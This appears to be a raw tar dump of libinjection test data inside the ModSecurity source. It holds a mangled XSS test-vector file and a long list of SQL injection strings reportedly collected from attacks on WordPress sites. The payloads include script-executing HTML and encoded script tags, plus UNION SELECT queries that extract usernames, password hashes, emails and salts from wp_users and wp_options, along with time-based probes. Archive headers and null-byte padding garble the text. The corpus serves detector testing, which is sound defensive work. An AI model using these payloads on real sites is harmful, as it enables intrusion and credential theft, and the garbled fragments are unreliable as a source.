DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF `><img src=x:x onerror=alert(2)// `><img src=x:x onerror=alert(3)// test test test test test test test test test test test test test test test test test test kcf test test test test test test test test test test test test test test test kcfkcf testtest test XXKCF `><img src=x:x onerror=alert(1)></a> `><img src=x:x onerror=javascript:alert(1)></a> kcfkcf testtest test1 test1 KCF test test test test test test test test test test test test test test kcf test test test test test test kcf [data "1
"] data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E data:text/html,%3Cscript%3Ealert(1)%3C/script%3E data:text/html,
kcf
X
X
KCF
x
style="x:">
DIV
XXX
XXX
X
X
X
.
KCF
XXX
X
X
KCF
XXX
kcf/div>
X
X
x​
x
x
x
x
X
{IE7}
]>&x; %E0 exp/* exp/* exp/* feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e feed:data:text/html,%3csvg%20onload=alert%281%29%3e /XXX KCF +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('KCF');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-%25(payload)s;+ADw-/SCRIPT+AD4- htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);}; htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(1); } }catch(e){alert(1);}; KCF""","XML namespace."),(""" http://%22%20onerror=%22alert%281%29;// http://www.keralacyberforcealert(1) "> /*iframe/src*/ 69) 72) 73) 74) click 75) 76) 83) 84) 85) 88) --!> 93) 94)
x 95) "> 96)
test 73 test 74 test 75 test 76_1 &x; test 72_2 test 77 test 78 test 79 # test 80 TBD IE6 and halfwidth/fullwidth Unicode characters test 81 test 82 test 83 test 84 test 86 test 86 test 87 test 88_0 test 88_1 test 88_2 test 88_3 test 88_4 test 88_5 test 89_1 test 89_2 test 90_1
test 90_2
PRESS ENTER
test 90_3 # test 91 test 91_1 "> test 91_2 "> test 91_3 "> # obsolete Safari 4 #test 91_4 "> # obsolete Opera 11 #test 91_5 test 91_6 <%25 foo> test 92
X
test 93
X
test 94_1 alert(1) test 94_2 alert(1) test 95_1 test 95_2 test 96_1 test 96_2 test 97_1
test 97_2
test 98
X
test 99 XXX # # # normal case test 100_0 # [a]case test 100_1 test 100_2 test 100_3 test 100_4 test 100_5 test 100_6 test 100_7 # [b] case test 100_8 test 100_9 # [c] case test 100_10 test 100_11 test 100_12 test 100_13 test 100_14 test 100_15 test 100_16 # [d] case test 100_17 test 100_18 test 100_19 test 100_20 test 100_21 test 100_22 # [e] case test 100_23 test 100_24 test 100_25 test 100_26 test 100_27 test 100_28 test 100_29 #
XXX test 101_x XXX test 101_0 XXX test 101_1 XXX test 101_2 XXX test 101_3 XXX test 101_4 XXX test 101_5 XXX test 101_6 XXX test 101_7 XXX test 101_8 XXX test 101_9 XXX test 101_10 XXX test 101_11 XXX test 101_12 XXX test 101_13 XXX test 101_14 XXX test 101_15 XXX test 101_16 XXX test 101_17 XXX test 101_18 XXX test 101_19 XXX test 101_20 XXX test 101_21 XXX test 101_22 XXX test 101_23 XXX test 101_24 XXX test 101_25 XXX test 101_26 XXX test 101_27 XXX test 101_28 XXX test 101_29 XXX test 101_30 XXX test 101_31 XXX test 101_32 XXX # B -- other cases are obsolete test 101_33 XXX # Confirmed in IE8, Does not work in IE9+ test 102 test 103 test 104 test 105 # Safari 4, supported 2005-2010, now obsolete # test 106 test 107 test 108_1 `><img src=xx:x onerror=alert(1)></a> test 108_2 `><img src=xx:x onerror=alert(2)// test 108_3 `><img src=xx:x onerror=alert(3)// # test 109 SVG test 110_1 test 110_2 test 111
X
test 112
X
test 113
XXX
test 114 XXX test 115_1 test 115_2 test 116_1 test 116_2 test 117 test 118

Drop me

test 119 test 120 Spam # original for SVG masking # repurposing this as a generic "no SVG" test 121_1 test 121_2 test 121_3 test 122 # test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting test 124_1 // Safari 5.0, Chrome 9, 10 test 124_2 // Safari 5.0 test 125 test 126_1 test 127_2 test 127_1 alert(1) test 127_2 alert(1) test 127_3 test 128 %25></xmp><img src=xx:x onerror=alert(1)// test 134_2 %25>/ alert(2) test 134_3 XXX -->{} *{color:red} test 135 # Somewhat odd injection -- ignoring. We can ban dirname is this # is really a problem #test 136 test 137_1 test 137_2 ���������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-v3.0.4/others/libinjection/data/xss-angular-pull-11290.txt������������������������������0000644�0001750�0001750�00000000212�13607066311�026022� 0����������������������������������������������������������������������������������������������������ustar �zimmerle������������������������zimmerle���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # https://github.com/angular/angular.js/pull/11290 # ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-v3.0.4/others/libinjection/data/xss-0x6D6172696F-394932823645503488.txt�����������������0000644�0001750�0001750�00000000276�13607066311�026336� 0����������������������������������������������������������������������������������������������������ustar �zimmerle������������������������zimmerle���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������# https://twitter.com/0x6D6172696F/status/394932823645503488 # http://pastebin.com/jNPbhduR

modsecurity-v3.0.4/others/libinjection/data/tbd-xss-github-issue-68.txt0000644000175000017500000000024513607066311026365 0ustar zimmerlezimmerle# https://github.com/client9/libinjection/issues/68 %3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F modsecurity-v3.0.4/others/libinjection/data/sqli-wordpress_rbarnett.txt0000644000175000017500000103054613607066311027047 0ustar zimmerlezimmerle# Real world SQLi from wordpress sites # Courtesy Ryan Barnett # '1' OR '1'='1 ## 'null -1 UNION ALL SELECT -1 UNION ALL SELECT 1 -1 UNION ALL SELECT 1, -1 UNION ALL SELECT 1,2 -1 UNION ALL SELECT 1,2, -1 UNION ALL SELECT 1,2,3 -1 UNION ALL SELECT 7 -1 UNION ALL SELECT 7,7 -1 UNION ALL SELECT 7,7,7 -1 UNION ALL SELECT 7,7,7,7 -1 UNION ALL SELECT 7,7,7,7,7 -1 UNION ALL SELECT 7,7,7,7,7,7 -1 UNION ALL SELECT 7,7,7,7,7,7,7 -1 UNION ALL SELECT 7,7,7,7,7,7,7,7 -1 UNION ALL SELECT 7,7,7,7,7,7,7,7,7 -1 UNION ALL SELECT @@version,2,3 -1 UNION ALL SELECT @@version,2,3-- -1 UNION ALL SELECT concat(0x7c,user_login,0x7c,user_pass,0x7c),2,3 -1 UNION ALL SELECT concat(0x7c,user_login,0x7c,user_pass,0x7c),2,3 from wp_users-- -1 UNION ALL SELECT version(),2,3 -1 UNION ALL SELECT version,2,3 -1 UNION SELECT 0x65727230722d31,0x65727230722d32,0x65727230722d33,0x65727230722d34,0x65727230722d35,0x65727230722d36,0x65727230722d37-- -1 UNION SELECT 0x65727230722d31,0x65727230722d32,0x65727230722d33,0x65727230722d34,0x65727230722d35,0x65727230722d36-- -1 UNION SELECT 0x65727230722d31,0x65727230722d32,0x65727230722d33,0x65727230722d34,0x65727230722d35-- -1 UNION SELECT 0x65727230722d31,0x65727230722d32,0x65727230722d33,0x65727230722d34-- -1 UNION SELECT 0x65727230722d31,0x65727230722d32,0x65727230722d33-- -1 UNION SELECT 0x65727230722d31,0x65727230722d32-- -1 UNION SELECT 0x65727230722d31-- -1 UNION SELECT 0x73716C696E6A666C6431-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 17,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 18,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 19,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 20,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 21,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 22,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 23,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 24,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 25,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 26,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 27,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 28,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 29,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 30,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 31,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 32,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 33,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 34,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 35,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 36,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 37,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 38,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 39,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 40,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A64656C,TABLE_ROWS) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A64656C,TABLE_ROWS) FROM INFORMATION_SCHEMA.TABLES LIMIT 17,1),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),6,7-- -1 UNION SELECT 888888888,1,1 -1 and 1=0 -1 and 1=1 -1 and 1>1 -1 and if(1=1,BENCHMARK(1144000,MD5(0x41)),0) -1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 -1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 -1 union select 1,0x6875616B,3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value&gt;7-- -1 union select 1,0x6875616B,3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7-- -1 union select 1,0x6875616B,3,4,5,6,7 from wp_users where user_level&gt;7-- -1 union select 1,0x6875616B,3,4,5,6,7 from wp_users-- -1 union select 1,0x6875616B,3,4,5,6,7-- -1 union select 1,0x6875616B,3,4,5,6,7/* -1 union select 1,0x6875616B,3,4,5,6,7/* AND status = 'include' -1 union select 1,2),3,concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7 from wp_users-- -1 union select 1,2,3,4,concat(option_name,0x3a,option_value),6,7 from wp_options -- -1 union select 1,2,3,4,concat(user_login,0x3a,user_pass,0x3a,user_email),6,7 from wp_users -- -1 union select 1,2,3,4,concat(user_login,0x3a,user_pass,0x3a,user_email),6,7 from wp_users-- -1 union select 1,2,3,concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7 from wp_users-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1,2)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1,2,3)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1,2,3,4)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1,2,3,4,5)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7 and id not in(1,2,3,4,5,6)-- -1 union select 1,concat(0x3A,0x3A,0x3A,id,0x3A,0x3A,0x3A,user_login,0x3A,0x3A,0x3A,user_pass,0x3A,0x3A,0x3A),3,4,5,6,7 from wp_users LEFT JOIN wp_usermeta ON ID=user_id WHERE meta_key=0x77705f757365725f6c6576656c AND meta_value>7-- -1 union select 1,concat(0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,user_login,0x3a,user_pass,0x3a,0x3a,0x3a,0x3a,0x3a),3,4,5,6,7 from wp_users -- -1 union select 1,concat(user_login,0x3a,user -1 union select 1,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7 from wp_users -- -1 union select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_login,0x3a,user_pass,0x3a, user_email),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7 from wp_users -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7 from wp_users AND status = 'include' -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email,0x436176616c657261),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email,0x4861636B20427920436176616C657261),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_login,0x3a,user_pass,0x3a,user_email,0x4861636B204279206D725F6A65636B),3,4,5,6,7 from wp_users-- -1 union select 1,concat(user_pass,0x3a,user_email),3,4,5,6,7 from wp_users-- -1 union select concat(0x7c,user_login,0x7c,user_pass,0x7c) from wp_users-- -1" and "x"="x -1" and "x"="y ## -1' -1' and 'x'='x -1' and 'x'='y -1' and if(1=1,BENCHMARK(1144000,MD5(0x41)),0) and 'x'='x -1'; if (1=1) waitfor delay '00:00:01'-- -1; if (1=1) waitfor delay '00:00:01'-- -999 union select 1,concat( CHAR(104,97,119,107,49),option_value,CHAR(104,97,11' at line 1 for query SELECT * FROM wp_forum_posts WHERE parent_id = =-999 union select 1,concat( CHAR(104,97,119,107,49),option_value,CHAR(104,97,119,107,50)),3,4,5,6,7 from wp_options where option_name=CHAR(97,117,116,104,95,115,97,108,116) limit 1 -- -999 union select 1,concat( CHAR(104,97,119,107,49),option_value,CHAR(104,97,11' at line 1 for query SELECT subject FROM wp_forum_threads WHERE id = =-999 union select 1,concat( CHAR(104,97,119,107,49),option_value,CHAR(104,97,119,107,50)),3,4,5,6,7 from wp_options where option_name=CHAR(97,117,116,104,95,115,97,108,116) limit 1 -- made by get_subject -999.9 UNION ALL SELECT (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x636F6D6C617465725F6D61727461)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 0,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 1,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 10,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 100,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 101,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 102,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 103,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 104,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 105,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 106,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 107,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 108,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 109,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 11,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 110,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 111,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 112,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 113,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 114,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 115,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 116,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 117,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 118,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 119,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 12,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 120,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 121,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 122,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 123,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 124,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 125,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM 